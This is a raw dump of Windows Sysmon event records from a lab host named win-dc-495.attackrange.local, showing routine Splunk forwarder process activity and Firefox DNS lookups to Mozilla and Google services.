AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:48.171{59A5CD1D-94CC-6005-4A05-00000000A301}68965208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:48.015{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-94CC-6005-4A05-00000000A301}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:48.015{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-94CC-6005-4A05-00000000A301}6896C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:48.015{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-94CC-6005-4A05-00000000A301}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:48.016{59A5CD1D-94CC-6005-4A05-00000000A301}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:49.738{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-94CD-6005-4C05-00000000A301}2512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:49.736{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:49.736{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:49.736{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:49.736{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:49.736{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-94CD-6005-4C05-00000000A301}2512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:49.735{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-94CD-6005-4C05-00000000A301}2512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:49.735{59A5CD1D-94CD-6005-4C05-00000000A301}2512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:59.602{59A5CD1D-93FA-6005-FC04-00000000A301}37841192C:\Windows\Explorer.EXE{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a4660|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952B4B17)|UNKNOWN(FFFFD3D9952AF1A1)|UNKNOWN(FFFFD3D9952B0B6A)|UNKNOWN(FFFFD3D9952AEE26)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a7ecb|C:\Windows\System32\SHELL32.dll+6988a|C:\Windows\System32\SHCORE.dll+33fad 10341000x800000000000000018434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:59.602{59A5CD1D-93FA-6005-FC04-00000000A301}37841192C:\Windows\Explorer.EXE{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a4141|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952B4B17)|UNKNOWN(FFFFD3D9952AF1A1)|UNKNOWN(FFFFD3D9952B0B6A)|UNKNOWN(FFFFD3D9952AEE26)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a7ecb|C:\Windows\System32\SHELL32.dll+6988a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000018446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:02:00.798{59A5CD1D-945A-6005-3305-00000000A301}7052d2nxq2uap88usk.cloudfront.net02600:9000:2070:fc00:a:da5e:7900:93a1;2600:9000:2070:0:a:da5e:7900:93a1;2600:9000:2070:2600:a:da5e:7900:93a1;2600:9000:2070:2a00:a:da5e:7900:93a1;2600:9000:2070:d400:a:da5e:7900:93a1;2600:9000:2070:d800:a:da5e:7900:93a1;2600:9000:2070:de00:a:da5e:7900:93a1;2600:9000:2070:e400:a:da5e:7900:93a1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.784{59A5CD1D-945A-6005-3305-00000000A301}7052d2nxq2uap88usk.cloudfront.net0143.204.94.19;143.204.94.69;143.204.94.117;143.204.94.14;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.783{59A5CD1D-945A-6005-3305-00000000A301}7052content-signature-2.cdn.mozilla.net0type: 5 d2nxq2uap88usk.cloudfront.net;::ffff:143.204.94.14;::ffff:143.204.94.19;::ffff:143.204.94.69;::ffff:143.204.94.117;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.752{59A5CD1D-945A-6005-3305-00000000A301}7052a19.dscg10.akamai.net02a02:26f0:10::5c7a:d693;2a02:26f0:10::5c7a:d691;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.749{59A5CD1D-945A-6005-3305-00000000A301}7052a19.dscg10.akamai.net023.55.161.211;23.55.161.185;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.748{59A5CD1D-945A-6005-3305-00000000A301}7052ciscobinary.openh264.org0type: 5 a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com;type: 5 a17.rackcdn.com;type: 5 a17.rackcdn.com.mdc.edgesuite.net;type: 5 
a19.dscg10.akamai.net;::ffff:23.55.161.185;::ffff:23.55.161.211;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.644{59A5CD1D-945A-6005-3305-00000000A301}7052firefox.settings.services.mozilla.com013.227.156.17;13.227.156.19;13.227.156.108;13.227.156.119;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.643{59A5CD1D-945A-6005-3305-00000000A301}7052firefox.settings.services.mozilla.com0::ffff:13.227.156.119;::ffff:13.227.156.17;::ffff:13.227.156.19;::ffff:13.227.156.108;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.535{59A5CD1D-945A-6005-3305-00000000A301}7052prod.balrog.prod.cloudops.mozgcp.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.505{59A5CD1D-945A-6005-3305-00000000A301}7052prod.balrog.prod.cloudops.mozgcp.net035.244.181.201;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.504{59A5CD1D-945A-6005-3305-00000000A301}7052aus5.mozilla.org0type: 5 balrog-aus5.r53-2.services.mozilla.com;type: 5 prod.balrog.prod.cloudops.mozgcp.net;::ffff:35.244.181.201;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:01.227{59A5CD1D-8E56-6005-2E00-00000000A301}2464185.161.55.23.in-addr.arpa.0type: 12 a23-55-161-185.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 22542200x800000000000000018456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:02:01.225{59A5CD1D-8E56-6005-2E00-00000000A301}2464206.21.217.172.in-addr.arpa.0type: 12 fra16s12-in-f14.1e100.net;type: 12 fra16s12-in-f206.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000018455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.931{59A5CD1D-945A-6005-3305-00000000A301}7052r3.sn-4g5edns7.gvt1.com02a00:1450:4001:68::8;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.917{59A5CD1D-945A-6005-3305-00000000A301}7052pki-goog.l.google.com02a00:1450:4001:81b::2003;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.915{59A5CD1D-945A-6005-3305-00000000A301}7052pki-goog.l.google.com0216.58.212.131;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.915{59A5CD1D-945A-6005-3305-00000000A301}7052ocsp.pki.goog0type: 5 pki-goog.l.google.com;::ffff:216.58.212.131;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.906{59A5CD1D-945A-6005-3305-00000000A301}7052r3.sn-4g5edns7.gvt1.com0173.194.188.8;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.905{59A5CD1D-945A-6005-3305-00000000A301}7052r3---sn-4g5edns7.gvt1.com0type: 5 r3.sn-4g5edns7.gvt1.com;::ffff:173.194.188.8;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.879{59A5CD1D-945A-6005-3305-00000000A301}7052redirector.gvt1.com02a00:1450:4001:81f::200e;C:\Program Files\Mozilla Firefox\firefox.exe 
22542200x800000000000000018448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.877{59A5CD1D-945A-6005-3305-00000000A301}7052redirector.gvt1.com0172.217.21.206;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.876{59A5CD1D-945A-6005-3305-00000000A301}7052redirector.gvt1.com0::ffff:172.217.21.206;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:01.239{59A5CD1D-8E56-6005-2E00-00000000A301}2464201.181.244.35.in-addr.arpa.0type: 12 201.181.244.35.bc.googleusercontent.com;C:\Windows\sysmon64.exe 22542200x800000000000000018458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:01.229{59A5CD1D-8E56-6005-2E00-00000000A301}2464119.156.227.13.in-addr.arpa.0type: 12 server-13-227-156-119.muc51.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000018461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:03.248{59A5CD1D-8E56-6005-2E00-00000000A301}246414.94.204.143.in-addr.arpa.0type: 12 server-143-204-94-14.fra50.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000018460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:02.263{59A5CD1D-8E56-6005-2E00-00000000A301}24648.188.194.173.in-addr.arpa.9003-C:\Windows\sysmon64.exe 10341000x800000000000000018463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:06.169{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla 